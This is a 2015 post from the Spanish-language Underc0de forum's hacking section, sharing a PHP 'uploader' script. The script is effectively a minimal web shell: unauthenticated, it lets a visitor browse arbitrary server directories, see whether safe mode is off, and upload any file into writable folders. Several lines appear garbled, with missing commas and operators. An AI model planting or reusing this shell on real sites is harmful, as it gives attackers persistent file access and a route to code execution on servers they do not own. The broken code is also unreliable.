Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: Decode en Septiembre 10, 2015, 05:10:21 PM

Título: Uploader
Publicado por: Decode en Septiembre 10, 2015, 05:10:21 PM
Hola gente, aquí les traigo un uploader que muestra los archivos de la web + los directorios que compone:

Código [Seleccionar]
<html><head><title>Upload File</title>

<style>

body{background-color:#000; color:#FFF;}

a{color: #999; text-decoration:none;}

a:hover{text-decoration:underline;}

input,textarea,select{ color:#fff;background-color:#000;border:0;}

</style>
<?php

echo "

<script>

var d = document;

function g(c) {

d.mf.c.value=c;

d.mf.submit();

}

</script>

</head><body>";

echo PHP_OS;

if(strtoupper(substr(PHP_OS03) ) == "WIN")

 $os 'win';

else

 $os 'nix';



$home_cwd = @getcwd();

if(isset($_POST['c']))

 @chdir($_POST['c']);

$cwd = @getcwd();

if($os == 'win') {

 $home_cwd str_replace("\\""/"$home_cwd);

 $cwd str_replace("\\""/"$cwd);

 echo "<!-- <td><nobr>Windows --!>";

 echo "<!-- g('FilesMan','c:/') --!>";

}



$safe_mode = @ini_get('safe_mode');

 if(!$safe_mode) {

 echo "<!-- Safe mode:</span> <font color=#00bb00><b>OFF</b></font> --!>\n";

 echo "<!-- Safe mode:</span> <font color=green><b>OFF</b></font> --!>\n";

 }





if($cwd[strlen($cwd)-1] != '/')

 $cwd .= '/';



echo "Path: ".htmlspecialchars($cwd)."<input type=hidden name=c value='".htmlspecialchars($cwd) ."'><hr>";

if (!is_writable($cwd)) {

 echo "<font color=red>(Not writable)</font><br>";

}

if($_POST['p1'] === 'uploadFile') {

 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))

 echo "Can't upload!<br />";

}



$ls wscandir($cwd);

echo "<form method=post name=mf style='display:none;'><input type=hidden name=c></form>";

foreach ($ls as $f) {

 if (is_dir($f)) {

 echo "<a href=# onclick='g(\"".$cwd.$f."\");'>".$f."</a>";

 if (is_writable($cwd.$f)) {

 echo "<!-- 'filename.php','chmod')\"><font color=green> --!> ";

 } else {

 echo "<!-- 'filename.php','chmod')\"><font color=white> --!> ";

 }

 echo "<br />";

 } else {

 $files[] = $f;

 }

}

foreach ($files as $file) {

 echo $file."<br />";

}

echo "<hr><form method='post' ENCTYPE='multipart/form-data'>

<input type=hidden name=c value='" $cwd ."'>

<input type=hidden name=p1 value='uploadFile'>

Upload File: <input type=file name=f><input type=submit value='>>'></form>";



function wscandir($cwdir) {

 if(function_exists("scandir")) {

 return scandir($cwdir);

 } else {

 $cwdh  opendir($cwdir);

 while (false !== ($filename readdir($cwdh)))

 $files[] = $filename;

 return $files;

 }

}

echo "</body></html>";

Saludos.
Sólo texto | Texto con Imágenes